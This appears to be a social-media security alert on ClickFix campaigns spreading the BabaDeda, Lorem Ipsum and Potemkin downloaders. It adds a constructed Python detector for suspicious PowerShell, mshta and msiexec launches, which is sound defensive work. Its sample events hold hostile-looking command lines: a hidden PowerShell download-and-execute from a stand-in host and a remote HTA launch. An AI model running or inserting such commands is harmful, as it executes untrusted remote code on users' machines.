VMTech
VMTECH · INSTAGRAM

ClickFix: BabaDeda, Lorem Ipsum and Potemkin — new downloaders in attacks

Colleagues — a cybersecurity alert: ClickFix campaigns deploy new downloaders.

- Who: Morphisec, BlueVoyant and Huntress report BabaDeda, Lorem Ipsum and Potemkin.
- How: ClickFix social engineering (fake updates, command injection), compromised WordPress, ZIP/MSI/HTA, DLL side‑loading, external storage (Storage Crypter).
- What: info‑stealers, RATs, RMM, stealth in‑memory execution, DGA and resilient C2.
- I recommend: block in‑browser command injection, enforce strict PowerShell policies, control DLL loading and monitor DGA/anomalies.
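
Added example (not part of the original post or of the vendors' reports): one way to monitor process-creation logs for ClickFix-style pasted commands involving PowerShell, HTA and MSI. The rule set, the `explorer.exe` parent heuristic and the sample events are assumptions constructed for illustration.

```python
import re

# Constructed heuristics (assumptions, not from the post or the vendor reports):
# a pasted ClickFix command usually runs as a script host or installer started
# directly by the user's shell, explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
WATCHED_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "msiexec.exe", "cmd.exe"}
RULES = [
    ("remote_url", re.compile(r"https?://", re.I)),
    ("encoded_command", re.compile(r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("download_and_run", re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|downloadstring)\b", re.I)),
    ("lure_text", re.compile(r"captcha|not a robot|verif", re.I)),
]

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def score_event(event):
    """Names of the rules an event hits; [] when parent or image is out of scope."""
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["image"]) not in WATCHED_IMAGES:
        return []
    return [name for name, rx in RULES if rx.search(event["cmdline"])]

def triage(events, threshold=1):
    """(host, hits) for events with at least `threshold` hits, strongest first."""
    flagged = [(e["host"], hits) for e in events
               if len(hits := score_event(e)) >= threshold]
    return sorted(flagged, key=lambda item: len(item[1]), reverse=True)

# Constructed process-creation events (Sysmon Event ID 1 style fields, simplified).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -c "iwr https://update.example.invalid/fix.ps1 | iex" # I am not a robot'},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.example.invalid/check.hta"},
    {"host": "ws-03", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f'"{PS}"'},  # user opened a console: no rule hits
    {"host": "srv-01", "parent": r"C:\Program Files\Mgmt\agent.exe", "image": PS,
     "cmdline": "powershell -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},  # not user-launched
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, hits)
```

Scoping to a user-shell parent keeps management agents that legitimately run encoded PowerShell out of this rule; those need their own baseline.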

Why it matters: ClickFix exploits the human factor and reduces the effectiveness of traditional defenses.

Which of these measures do you consider priorities?

#cybersecurity #malware #SOC #infosec
